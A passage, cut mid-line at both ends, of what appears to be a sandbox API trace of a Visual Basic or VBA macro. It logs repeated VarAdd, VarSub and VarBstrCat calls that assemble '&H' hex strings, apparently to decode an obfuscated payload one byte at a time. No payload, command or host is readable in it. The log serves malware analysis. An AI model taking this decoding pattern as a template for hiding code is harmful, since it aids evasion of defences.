pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.883] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.883] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.883] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.883] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.883] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.884] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.884] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.884] VarBstrCat (in: bstrLeft="&H3", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.884] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.884] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.884] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.884] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.884] VarBstrCat (in: bstrLeft="&H7", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.884] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.884] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.884] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.884] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.884] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.885] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.885] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.885] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.885] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.885] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.885] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.885] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.885] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.885] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.885] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.885] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.885] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.885] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.885] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.886] VarBstrCat (in: bstrLeft="&H0", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.886] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.886] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.886] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.886] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.886] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.886] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.886] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.886] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.886] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.886] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.886] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.887] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.887] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.887] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.887] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.887] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.887] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.887] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.887] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.887] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.887] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.887] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.887] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.887] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.888] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.888] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.888] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.888] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.888] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.888] VarBstrCat (in: bstrLeft="&Hb", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.888] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.888] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.888] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.888] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.888] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.888] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.889] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.889] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.889] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.889] VarBstrCat (in: bstrLeft="&Hf", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.889] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.889] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.889] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.889] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.889] VarBstrCat (in: bstrLeft="&H3", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.889] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.889] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.889] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.889] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.889] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.890] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.890] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.890] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.890] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.890] VarBstrCat (in: bstrLeft="&H3", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.890] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.890] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.890] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.890] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.890] VarBstrCat (in: bstrLeft="&H7", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.890] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.891] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.891] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.891] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.891] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.891] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.891] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.891] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.891] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.891] VarBstrCat (in: bstrLeft="&He", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.891] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.891] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.891] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.891] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.892] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.892] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.892] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.933] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.933] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.933] VarBstrCat (in: bstrLeft="&H0", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.934] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.934] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.934] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.934] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.934] VarBstrCat (in: bstrLeft="&H5", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.934] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.934] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.934] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.934] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.934] VarBstrCat (in: bstrLeft="&Hc", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.934] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.934] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.934] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.934] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.935] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.935] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.935] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.935] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.935] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.935] VarBstrCat (in: bstrLeft="&Hf", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.935] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.935] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.935] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.935] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.935] VarBstrCat (in: bstrLeft="&Hb", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.935] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.935] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.935] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.935] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.935] VarBstrCat (in: bstrLeft="&Hb", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.936] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.936] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.936] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.936] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.936] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.936] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.936] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.936] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.936] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.936] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.936] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.936] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.936] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.936] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.936] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.937] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.937] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.937] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.937] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.937] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.937] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.937] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.937] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.937] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.937] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.937] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.937] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.937] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.938] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.938] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.938] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.938] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.938] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.938] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.938] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.938] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.938] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.938] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.938] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.938] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.938] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.938] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.938] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.939] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.939] VarBstrCat (in: bstrLeft="&Hb", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.939] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.939] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.939] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.939] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.939] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.940] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.940] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.940] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.940] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.940] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.940] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.940] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.940] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.940] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.940] VarBstrCat (in: bstrLeft="&H1", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0105.940] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0105.940] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0105.940] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: 